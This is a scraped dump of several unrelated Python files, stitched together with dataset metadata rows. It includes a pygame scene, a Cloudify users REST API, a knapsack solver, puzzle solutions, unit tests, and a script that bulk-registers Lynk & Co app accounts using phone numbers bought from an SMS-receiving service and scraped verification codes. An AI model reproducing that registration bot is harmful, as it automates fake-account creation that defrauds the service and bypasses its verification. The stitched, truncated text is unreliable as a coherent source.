mountain = pygame.Surface((600,128))
mountain.set_colorkey([0,0,0]) # Black is transparent
r=96; g=64; b=255
for l in range (0,128):
pygame.draw.rect(mountain,(r,g,b),(0,l-2,600,l))
r=r+2;g=g+2;b=b+2
if r>=255: r=255
if g>=255: g=255
if b>=255: b=255
# Draw some black (Transparent) polygons to create mountain peaks
# The screen is 600 wide so I've drawn 10 polygons at 60 pixels wide each
pygame.draw.polygon(mountain,[0,0,0],[(0,0),(60,0),(60,10),(0,40)])
pygame.draw.polygon(mountain,[0,0,0],[(60,0),(120,0),(120,30),(60,10)])
pygame.draw.polygon(mountain,[0,0,0],[(120,0),(180,0),(180,20),(120,30)])
pygame.draw.polygon(mountain,[0,0,0],[(180,0),(240,0),(240,50),(180,20)])
pygame.draw.polygon(mountain,[0,0,0],[(240,0),(300,0),(300,40),(240,50)])
pygame.draw.polygon(mountain,[0,0,0],[(300,0),(360,0),(360,10),(300,40)])
pygame.draw.polygon(mountain,[0,0,0],[(360,0),(420,0),(420,35),(360,10)])
pygame.draw.polygon(mountain,[0,0,0],[(420,0),(480,0),(480,45),(420,35)])
pygame.draw.polygon(mountain,[0,0,0],[(480,0),(540,0),(540,42),(480,45)])
pygame.draw.polygon(mountain,[0,0,0],[(540,0),(600,0),(600,15),(540,42)])
screen.blit(sky,(0,0))
screen.blit(ground,(0,255))
screen.blit(mountain,(0,128))
pygame.display.update()
pygame.time.wait(30000) | 34.101695 | 73 | 0.638171 | 416 | 2,012 | 3.072115 | 0.228365 | 0.039124 | 0.030516 | 0.195618 | 0.369327 | 0.349765 | 0.349765 | 0.21831 | 0.124413 | 0.07903 | 0 | 0.2 | 0.107853 | 2,012 | 59 | 74 | 34.101695 | 0.511978 | 0.12326 | 0 | 0.177778 | 0 | 0 | 0.019932 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022222 | 0 | 0.022222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4847f5739e2a2a4fe3f2279bc69fc734031f35e3 | 5,610 | py | Python | rest-service/manager_rest/rest/resources_v3/users.py | TS-at-WS/cloudify-manager | 3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc | [
"Apache-2.0"
] | null | null | null | rest-service/manager_rest/rest/resources_v3/users.py | TS-at-WS/cloudify-manager | 3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc | [
"Apache-2.0"
] | null | null | null | rest-service/manager_rest/rest/resources_v3/users.py | TS-at-WS/cloudify-manager | 3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc | [
"Apache-2.0"
] | null | null | null | #########
# Copyright (c) 2016 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask_security import current_user
from manager_rest import constants
from manager_rest.storage import models, user_datastore
from manager_rest.security.authorization import authorize
from manager_rest.security import (SecuredResource,
MissingPremiumFeatureResource)
from manager_rest.manager_exceptions import BadParametersError
from .. import rest_decorators, rest_utils
from ..responses_v3 import UserResponse
try:
from cloudify_premium.multi_tenancy.secured_tenant_resource \
import SecuredMultiTenancyResource
except ImportError:
SecuredMultiTenancyResource = MissingPremiumFeatureResource
class User(SecuredResource):
@authorize('user_get_self')
@rest_decorators.marshal_with(UserResponse)
def get(self):
"""
Get details for the current user
"""
return user_datastore.get_user(current_user.username)
class Users(SecuredMultiTenancyResource):
@authorize('user_list')
@rest_decorators.marshal_with(UserResponse)
@rest_decorators.create_filters(models.User)
@rest_decorators.paginate
@rest_decorators.sortable(models.User)
@rest_decorators.search('username')
def get(self, multi_tenancy, _include=None, filters=None, pagination=None,
sort=None, search=None, **kwargs):
"""
List users
"""
return multi_tenancy.list_users(
_include,
filters,
pagination,
sort,
search
)
@authorize('user_create')
@rest_decorators.marshal_with(UserResponse)
@rest_decorators.no_external_authenticator('create user')
def put(self, multi_tenancy):
"""
Create a user
"""
request_dict = rest_utils.get_json_and_verify_params(
{
'username': {
'type': unicode,
},
'password': {
'type': unicode,
},
'role': {
'type': unicode,
'optional': True,
},
}
)
# The password shouldn't be validated here
password = request_dict.pop('password')
password = rest_utils.validate_and_decode_password(password)
rest_utils.validate_inputs(request_dict)
role = request_dict.get('role', constants.DEFAULT_SYSTEM_ROLE)
rest_utils.verify_role(role, is_system_role=True)
return multi_tenancy.create_user(
request_dict['username'],
password,
role,
)
class UsersId(SecuredMultiTenancyResource):
@authorize('user_update')
@rest_decorators.marshal_with(UserResponse)
def post(self, username, multi_tenancy):
"""
Set password/role for a certain user
"""
request_dict = rest_utils.get_json_and_verify_params()
password = request_dict.get('password')
role_name = request_dict.get('role')
if password:
if role_name:
raise BadParametersError('Both `password` and `role` provided')
password = rest_utils.validate_and_decode_password(password)
return multi_tenancy.set_user_password(username, password)
elif role_name:
rest_utils.verify_role(role_name, is_system_role=True)
return multi_tenancy.set_user_role(username, role_name)
else:
raise BadParametersError('Neither `password` nor `role` provided')
@authorize('user_get')
@rest_decorators.marshal_with(UserResponse)
def get(self, username, multi_tenancy):
"""
Get details for a single user
"""
rest_utils.validate_inputs({'username': username})
return multi_tenancy.get_user(username)
@authorize('user_delete')
@rest_decorators.marshal_with(UserResponse)
@rest_decorators.no_external_authenticator('delete user')
def delete(self, username, multi_tenancy):
"""
Delete a user
"""
rest_utils.validate_inputs({'username': username})
return multi_tenancy.delete_user(username)
class UsersActive(SecuredMultiTenancyResource):
@authorize('user_set_activated')
@rest_decorators.marshal_with(UserResponse)
def post(self, username, multi_tenancy):
"""
Activate a user
"""
request_dict = rest_utils.get_json_and_verify_params({'action'})
if request_dict['action'] == 'activate':
return multi_tenancy.activate_user(username)
else:
return multi_tenancy.deactivate_user(username)
class UsersUnlock(SecuredMultiTenancyResource):
@authorize('user_unlock')
@rest_decorators.marshal_with(UserResponse)
def post(self, username, multi_tenancy):
"""
Unlock user account
"""
rest_utils.validate_inputs({'username': username})
return multi_tenancy.unlock_user(username)
| 34.207317 | 79 | 0.659893 | 595 | 5,610 | 5.984874 | 0.287395 | 0.057287 | 0.045493 | 0.056164 | 0.305251 | 0.276327 | 0.276327 | 0.242909 | 0.18843 | 0.172423 | 0 | 0.002149 | 0.253476 | 5,610 | 163 | 80 | 34.417178 | 0.848138 | 0.145633 | 0 | 0.198113 | 0 | 0 | 0.067815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075472 | false | 0.09434 | 0.09434 | 0 | 0.311321 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
48514c4855c82f6511561bc091163063091c1e9c | 664 | py | Python | ptranking/ltr_adhoc/util/one_hot_utils.py | junj2ejj/ptranking.github.io | 06fa9751dd2eca89749ba4bb9641e4272cfc30a1 | [
"MIT"
] | 1 | 2020-09-24T10:38:53.000Z | 2020-09-24T10:38:53.000Z | ptranking/ltr_adhoc/util/one_hot_utils.py | junj2ejj/ptranking.github.io | 06fa9751dd2eca89749ba4bb9641e4272cfc30a1 | [
"MIT"
] | null | null | null | ptranking/ltr_adhoc/util/one_hot_utils.py | junj2ejj/ptranking.github.io | 06fa9751dd2eca89749ba4bb9641e4272cfc30a1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Description
"""
import torch
from ptranking.ltr_global import global_gpu as gpu
def get_one_hot_reprs(batch_stds):
""" Get one-hot representation of batch ground-truth labels """
batch_size = batch_stds.size(0)
hist_size = batch_stds.size(1)
int_batch_stds = batch_stds.type(torch.cuda.LongTensor) if gpu else batch_stds.type(torch.LongTensor)
hot_batch_stds = torch.cuda.FloatTensor(batch_size, hist_size, 3) if gpu else torch.FloatTensor(batch_size, hist_size, 3)
hot_batch_stds.zero_()
hot_batch_stds.scatter_(2, torch.unsqueeze(int_batch_stds, 2), 1)
return hot_batch_stds
| 30.181818 | 125 | 0.74247 | 105 | 664 | 4.409524 | 0.428571 | 0.213823 | 0.103672 | 0.073434 | 0.12527 | 0.12527 | 0 | 0 | 0 | 0 | 0 | 0.014109 | 0.146084 | 664 | 21 | 126 | 31.619048 | 0.802469 | 0.167169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
485f7ffc14de09acdf65c094b7c9e15395d4ca1b | 1,001 | py | Python | problems/095.py | JoshKarpel/Euler | 9c4a89cfe4b0114d84a82e2b2894c7b8af815e93 | [
"MIT"
] | 1 | 2017-09-20T22:26:24.000Z | 2017-09-20T22:26:24.000Z | problems/095.py | JoshKarpel/euler-python | 9c4a89cfe4b0114d84a82e2b2894c7b8af815e93 | [
"MIT"
] | null | null | null | problems/095.py | JoshKarpel/euler-python | 9c4a89cfe4b0114d84a82e2b2894c7b8af815e93 | [
"MIT"
] | null | null | null | from problems import utils, mymath
@utils.memoize
def sum_proper_factors(n):
return sum(mymath.proper_factorization(n))
def solve():
upper_bound = 1000000
chains = dict()
for start_number in range(1, upper_bound):
chain = [start_number]
current_number = sum_proper_factors(start_number)
while current_number != start_number:
if current_number > upper_bound or current_number == 0 or len(chain) > 100:
break
elif current_number in chains:
chain += chains[current_number]
break
else:
chain.append(current_number)
current_number = sum_proper_factors(current_number)
if current_number == start_number:
chains[start_number] = chain
chain_lengths = {i: len(chains[i]) for i in chains}
max_key = mymath.key_of_max_value(chain_lengths)
return min(chains[max_key])
if __name__ == '__main__':
print(solve())
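The helpers `utils.memoize` and `mymath.proper_factorization` live outside this file; a self-contained equivalent of `sum_proper_factors` using only the standard library might look like this (a sketch, not the project's actual implementation):

```python
from functools import lru_cache

@lru_cache(maxsize=None)
def sum_proper_divisors(n):
    """Sum of the proper divisors of n (divisors strictly less than n)."""
    total = 1 if n > 1 else 0  # 1 divides everything except itself
    d = 2
    while d * d <= n:
        if n % d == 0:
            total += d
            if d != n // d:      # avoid double-counting a square root
                total += n // d
        d += 1
    return total

# sum_proper_divisors(12) -> 16 (1+2+3+4+6); 28 is perfect: -> 28
```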
| 26.342105 | 87 | 0.632368 | 122 | 1,001 | 4.852459 | 0.385246 | 0.219595 | 0.081081 | 0.074324 | 0.118243 | 0.118243 | 0 | 0 | 0 | 0 | 0 | 0.016807 | 0.286713 | 1,001 | 37 | 88 | 27.054054 | 0.812325 | 0 | 0 | 0.076923 | 0 | 0 | 0.007992 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.038462 | 0.038462 | 0.192308 | 0.038462 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
486936b454230e71425f5f21ffabf8c3b40a119e | 595 | py | Python | DMOJ/CCC/slot machine.py | eddiegz/Personal-C | f7869826216e5c665f8f646502141f0dc680e545 | [
"MIT"
] | 3 | 2021-05-15T08:18:09.000Z | 2021-05-17T04:41:57.000Z | DMOJ/CCC/slot machine.py | eddiegz/Personal-C | f7869826216e5c665f8f646502141f0dc680e545 | [
"MIT"
] | null | null | null | DMOJ/CCC/slot machine.py | eddiegz/Personal-C | f7869826216e5c665f8f646502141f0dc680e545 | [
"MIT"
] | null | null | null | quarter=int(input())
p1 = int(input())
p2 = int(input())
p3 = int(input())
time = 0
while quarter > 0:
    # Machine 1: pays 30 quarters on every 35th play
    p1 += 1
    quarter -= 1
    time += 1
    if p1 == 35:
        quarter += 30
        p1 = 0
    if quarter == 0:
        continue
    # Machine 2: pays 60 quarters on every 100th play
    time += 1
    p2 += 1
    quarter -= 1
    if p2 == 100:
        p2 = 0
        quarter += 60
    if quarter == 0:
        continue
    # Machine 3: pays 9 quarters on every 10th play
    p3 += 1
    time += 1
    quarter -= 1
    if p3 == 10:
        quarter += 9
        p3 = 0
print(f'Martha plays {time} times before going broke.')
| 16.081081 | 56 | 0.438655 | 77 | 595 | 3.38961 | 0.337662 | 0.122605 | 0.114943 | 0.206897 | 0.145594 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122024 | 0.435294 | 595 | 37 | 57 | 16.081081 | 0.654762 | 0 | 0 | 0.387097 | 0 | 0 | 0.080357 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
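The stdin-driven loop in the slot-machine solution above can be factored into a function for testing; `simulate` is an illustrative name, but the payout rules below match the code:

```python
def simulate(quarter, p1=0, p2=0, p3=0):
    # Three machines played in rotation; they pay out 30, 60 and 9
    # quarters on their 35th, 100th and 10th play respectively
    time = 0
    while quarter > 0:
        p1 += 1; quarter -= 1; time += 1
        if p1 == 35:
            quarter += 30
            p1 = 0
        if quarter == 0:
            break
        p2 += 1; quarter -= 1; time += 1
        if p2 == 100:
            p2 = 0
            quarter += 60
        if quarter == 0:
            break
        p3 += 1; quarter -= 1; time += 1
        if p3 == 10:
            quarter += 9
            p3 = 0
    return time
```

With no payouts triggered, each quarter buys exactly one play; a payout (e.g. starting one play away from machine 1's jackpot) extends the session.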
486d212547e00f7831ca70c40d4c968f71b4de71 | 4,575 | py | Python | LynkCoHelper/lynco_regist_wrok.py | 21haoshaonian/LynkCoHelper | b4e5d67583190bf09fe44902499c3a99463b4df5 | [
"MIT"
] | null | null | null | LynkCoHelper/lynco_regist_wrok.py | 21haoshaonian/LynkCoHelper | b4e5d67583190bf09fe44902499c3a99463b4df5 | [
"MIT"
] | null | null | null | LynkCoHelper/lynco_regist_wrok.py | 21haoshaonian/LynkCoHelper | b4e5d67583190bf09fe44902499c3a99463b4df5 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import threading
import time
import base64
from lynkco_app_request import lynkco_app_request
from com.uestcit.api.gateway.sdk.auth.aes import aes as AES
from sms_request import sms_request
import json
import sys
import os
import re


class lynco_regist_wrok(threading.Thread):
    """Worker thread that runs the registration task."""

    def __init__(self, config):
        # Initialize the thread
        threading.Thread.__init__(self)
        # Cache the configuration
        self.config = config
        self.project_id = self.config['sms_platform']['project_id']
        self.max_count = int(self.config['sms_platform']['count'])
        self.sms_request = sms_request()
        # Cache the APPKEY (stored base64-encoded, so decode it once)
        self.app_key = base64.b64decode(self.config['api_geteway']['app_key']).decode('utf-8')
        # Cache the APPSECRET (stored base64-encoded, so decode it once)
        self.app_secret = base64.b64decode(self.config['api_geteway']['app_secret']).decode('utf-8')
        # Cache the AESKEY (stored base64-encoded twice, so decode it twice)
        self.aes_key = base64.b64decode(base64.b64decode(self.config['aes_key']).decode('utf-8')).decode('utf-8')
        self.AES = AES(self.aes_key)
        self.lynkco_app_request = lynkco_app_request(self.app_key, self.app_secret)
    def run(self):
        """Entry point of the thread."""
        print("Registration task started " + time.strftime('%Y-%m-%d %H:%M:%S'))
        self.token = self.get_token()
        if self.token == '':
            return 0
        phone_list = []
        while len(phone_list) < self.max_count:
            phone = self.regist()
            if phone == '':
                continue
            phone_list.append({'username': phone, 'password': 'a123456789'})
        with open(sys.path[0] + '/phone_list_' + time.strftime('%Y%m%d%H%M%S') + '.json', 'w') as json_file:
            json_file.write(json.dumps(phone_list, ensure_ascii=False))
        print("Registration task finished " + time.strftime('%Y-%m-%d %H:%M:%S'))

    def get_token(self):
        """Log in to the SMS platform and obtain a token."""
        sms_username = self.config['sms_platform']['username']
        sms_password = self.config['sms_platform']['password']
        context = self.sms_request.login(sms_username, sms_password)
        array = context.split('|')
        if int(array[0]) != 1:
            print("SMS account login failed: " + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
            return ''
        token = array[1]
        print("SMS account login succeeded, token: " + token + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
        return token
    def regist(self):
        """Registration flow on the app side."""
        # Obtain a phone number
        context = self.sms_request.get_phone(self.token, self.project_id)
        array = context.split('|')
        if int(array[0]) != 1:
            print("SMS account failed to get a phone number: " + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
            return ''
        phone = array[1]
        # Send the registration SMS
        response = self.lynkco_app_request.get_vcode_by_regist(phone)
        if response['code'] != 'success':
            print("Failed to send the registration SMS: " + response['message'] + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
            return ''
        # Poll for the SMS content up to 10 times, sleeping 3 seconds after each failure
        vcode = ''
        fail_count = 0
        while fail_count < 10:
            context = self.sms_request.get_phone_msg(self.token, self.project_id, phone)
            array = context.split('|')
            if int(array[0]) != 1:
                print("SMS account failed to fetch the message: " + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
                fail_count += 1
                time.sleep(3)
            else:
                context = array[1]
                # Extract the verification code with a regular expression
                pattern = re.compile(r'\d{6}')
                result = pattern.findall(context)
                if len(result) != 1:
                    print("SMS account failed to parse the verification code: " + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
                    fail_count += 1
                else:
                    vcode = result[0]
                    print("SMS account got the verification code: " + vcode + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
                    break
        if vcode == '':
            return ''
        # Submit the registration
        password = self.AES.encrypt('a123456789')
        response = self.lynkco_app_request.regist(phone, password, vcode)
        if response['code'] != 'success':
            print("Registration request failed: " + response['message'] + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
            return ''
        # Try logging in once
        response = self.lynkco_app_request.login(phone, password)
        if response['code'] != 'success':
            print("Login attempt failed: " + response['message'] + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
            return phone
        return phone
 | 39.782609 | 113 | 0.551257 | 535 | 4,575 | 4.571963 | 0.250467 | 0.058872 | 0.063778 | 0.068684 | 0.32175 | 0.237531 | 0.213818 | 0.182747 | 0.153312 | 0.091169 | 0 | 0.022936 | 0.285246 | 4,575 | 115 | 114 | 39.782609 | 0.725076 | 0.055956 | 0 | 0.202247 | 0 | 0 | 0.136427 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044944 | false | 0.067416 | 0.11236 | 0 | 0.269663 | 0.123596 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
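The verification-code step in `regist` above boils down to finding exactly one 6-digit run in the SMS body; a standalone sketch of that extraction (the message text is made up for illustration):

```python
import re

def extract_vcode(message):
    # Mirrors the worker above: accept the code only when exactly
    # one 6-digit sequence is present in the message
    result = re.compile(r'\d{6}').findall(message)
    return result[0] if len(result) == 1 else ''
```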
48769d3fe736152c54bf8b09ad3360ea09bd2080 | 1,181 | py | Python | scripts/12865.py | JihoChoi/BOJ | 08974a9db8ebaa299ace242e951cac53ab55fc4d | [
"MIT"
] | null | null | null | scripts/12865.py | JihoChoi/BOJ | 08974a9db8ebaa299ace242e951cac53ab55fc4d | [
"MIT"
] | null | null | null | scripts/12865.py | JihoChoi/BOJ | 08974a9db8ebaa299ace242e951cac53ab55fc4d | [
"MIT"
] | null | null | null |
"""
TAG: 0-1 Knapsack Problem, Dynamic Programming (DP), O(nW)
References:
- https://www.geeksforgeeks.org/0-1-knapsack-problem-dp-10/
weights and values of n items, capacity -> max value
"""
N, W = map(int, input().split()) # number of items, capacity
weights = []
values = []
for i in range(N):
    w, v = map(int, input().split())
    weights.append(w)
    values.append(v)


def knapsack(W, weights, values, n):
    dp = [[0 for x in range(W+1)] for x in range(n+1)]
    for i in range(n+1):
        for w in range(W+1):
            if i == 0 or w == 0:
                dp[i][w] = 0
            elif weights[i-1] <= w:
                dp[i][w] = max(values[i-1] + dp[i-1][w - weights[i-1]], dp[i-1][w])
            else:
                dp[i][w] = dp[i-1][w]
    return dp[n][W]


print(knapsack(W, weights, values, N))

# Naive
"""
def knapsack(W, weights, values, n):
    if n == 0 or W == 0:  # base
        return 0
    if (weights[n-1] > W):
        return knapsack(W, weights, values, n-1)
    else:
        return max(
            values[n-1] + knapsack(W - weights[n-1], weights, values, n-1),
            knapsack(W, weights, values, n-1)
        )
"""
| 21.87037 | 83 | 0.516511 | 191 | 1,181 | 3.193717 | 0.246073 | 0.02623 | 0.157377 | 0.180328 | 0.337705 | 0.239344 | 0 | 0 | 0 | 0 | 0 | 0.035237 | 0.303133 | 1,181 | 53 | 84 | 22.283019 | 0.705954 | 0.187976 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0 | 0 | 0.105263 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
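The 2-D table in the solution above can be collapsed to a single row by iterating capacities downward; a self-contained sketch of the same 0-1 recurrence (`knapsack_1d` is an illustrative name):

```python
def knapsack_1d(capacity, weights, values):
    # dp[w] = best value achievable with capacity w
    dp = [0] * (capacity + 1)
    for wt, val in zip(weights, values):
        # Downward iteration keeps the item 0-1 (used at most once)
        for w in range(capacity, wt - 1, -1):
            dp[w] = max(dp[w], dp[w - wt] + val)
    return dp[capacity]
```

With capacity 7 and (weight, value) items (6,13), (4,8), (3,6), (5,12), the items (4,8) and (3,6) exactly fill the sack for a value of 14.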
487c49f921ee4340fdfc140e8ff73bccf0d40cf6 | 3,273 | py | Python | test/broken_test_log.py | Brimizer/python-ant | 2b99693b4754156d401a0bd90e02357e8358c1f5 | [
"MIT"
] | null | null | null | test/broken_test_log.py | Brimizer/python-ant | 2b99693b4754156d401a0bd90e02357e8358c1f5 | [
"MIT"
] | null | null | null | test/broken_test_log.py | Brimizer/python-ant | 2b99693b4754156d401a0bd90e02357e8358c1f5 | [
"MIT"
] | 1 | 2019-01-11T22:22:06.000Z | 2019-01-11T22:22:06.000Z | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2011, Martín Raúl Villalba
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
##############################################################################
LOG_LOCATION = '/tmp/python-ant.logtest.ant'
import unittest
from ant.core.log import *
class LogReaderTest(unittest.TestCase):
    def setUp(self):
        lw = LogWriter(LOG_LOCATION)
        lw.logOpen()
        lw.logRead(b'\x01')
        lw.logWrite(b'\x00')
        lw.logRead(b'TEST')
        lw.logClose()
        lw.close()
        self.log = LogReader(LOG_LOCATION)

    def test_open_close(self):
        self.assertTrue(self.log.is_open)
        self.log.close()
        self.assertFalse(self.log.is_open)
        self.log.open(LOG_LOCATION)
        self.assertTrue(self.log.is_open)

    def test_read(self):
        t1 = self.log.read()
        t2 = self.log.read()
        t3 = self.log.read()
        t4 = self.log.read()
        t5 = self.log.read()
        self.assertEqual(self.log.read(), '')

        self.assertEqual(t1[0], EVENT_OPEN)
        self.assertTrue(isinstance(t1[1], int))
        self.assertEqual(len(t1), 2)

        self.assertEqual(t2[0], EVENT_READ)
        self.assertTrue(isinstance(t2[1], int))
        self.assertEqual(len(t2), 3)
        self.assertEqual(t2[2], b'\x01')

        self.assertEqual(t3[0], EVENT_WRITE)
        self.assertTrue(isinstance(t3[1], int))
        self.assertEqual(len(t3), 3)
        self.assertEqual(t3[2], '\x00')

        self.assertEqual(t4[0], EVENT_READ)
        self.assertEqual(t4[2], 'TEST')

        self.assertEqual(t5[0], EVENT_CLOSE)
        self.assertTrue(isinstance(t5[1], int))
        self.assertEqual(len(t5), 2)
class LogWriterTest(unittest.TestCase):
    def setUp(self):
        self.log = LogWriter(LOG_LOCATION)

    def test_open_close(self):
        self.assertTrue(self.log.is_open)
        self.log.close()
        self.assertFalse(self.log.is_open)
        self.log.open(LOG_LOCATION)
        self.assertTrue(self.log.is_open)

    def test_log(self):
        # Redundant, any error in log* methods will cause the LogReader test
        # suite to fail.
        pass
| 33.397959 | 78 | 0.633364 | 432 | 3,273 | 4.74537 | 0.354167 | 0.061463 | 0.026341 | 0.038049 | 0.299512 | 0.245854 | 0.245854 | 0.245854 | 0.245854 | 0.150244 | 0 | 0.019478 | 0.215704 | 3,273 | 97 | 79 | 33.742268 | 0.77912 | 0.355943 | 0 | 0.339623 | 0 | 0 | 0.026466 | 0.014011 | 0 | 0 | 0 | 0 | 0.433962 | 1 | 0.113208 | false | 0.018868 | 0.037736 | 0 | 0.188679 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4883b0040e8dc5ec47ef273298b6d359bf3bcacc | 2,409 | py | Python | EasyRecycle/tests/unittests/core/views/test_BecomeCommercialAPIView.py | YuriyLisovskiy/EasyRecycle | 49f1b84931145a3e95224e411d22ed7701e5bfe0 | [
"MIT"
] | null | null | null | EasyRecycle/tests/unittests/core/views/test_BecomeCommercialAPIView.py | YuriyLisovskiy/EasyRecycle | 49f1b84931145a3e95224e411d22ed7701e5bfe0 | [
"MIT"
] | null | null | null | EasyRecycle/tests/unittests/core/views/test_BecomeCommercialAPIView.py | YuriyLisovskiy/EasyRecycle | 49f1b84931145a3e95224e411d22ed7701e5bfe0 | [
"MIT"
] | null | null | null | from django.urls import reverse
from rest_framework import status
from rest_framework.test import force_authenticate
from rest_framework_simplejwt.state import User
from core.views import DeactivateSelfAPIView, BecomeCommercialAPIView
from tests.unittests.common import APIFactoryTestCase
class BecomeCommercialAPITestCase(APIFactoryTestCase):
    def setUp(self) -> None:
        super(BecomeCommercialAPITestCase, self).setUp()
        self.view = BecomeCommercialAPIView.as_view()
        self.user = User.objects.get(username='User')
        self.user_2 = User.objects.get(username='User2')
        self.user_3 = User.objects.get(username='User3')
        self.commercial_user = User.objects.get(username='Commercial')

    def test_BecomeCommercialValid(self):
        request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
            'password': 'qwerty'
        })
        force_authenticate(request, self.user)
        response = self.view(request)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(User.objects.get(username='User').is_commercial)

    def test_BecomeCommercialInvalid(self):
        request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
            'password': 'qerty'
        })
        force_authenticate(request, self.user)
        response = self.view(request)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_BecomeCommercialUnauthenticated(self):
        request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
            'password': 'qwerty'
        })
        response = self.view(request)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_BecomeCommercialNoData(self):
        request = self.request_factory.put(reverse('api_v1:core:become_commercial'))
        force_authenticate(request, self.user)
        response = self.view(request)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_BecomeCommercialAlreadyCommercial(self):
        request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
            'password': 'qwerty'
        })
        force_authenticate(request, self.commercial_user)
        response = self.view(request)
